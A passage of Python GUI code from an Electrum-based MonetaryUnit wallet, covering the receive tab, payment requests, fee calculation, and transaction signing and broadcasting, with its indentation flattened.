def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('MonetaryUnit address where the payment should be received. Note that each payment request uses a different MonetaryUnit address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding MonetaryUnit addresses.'),
_('The MonetaryUnit address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a MonetaryUnit address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a MonetaryUnit address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('MonetaryUnit transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('MonetaryUnit Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid MonetaryUnit Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
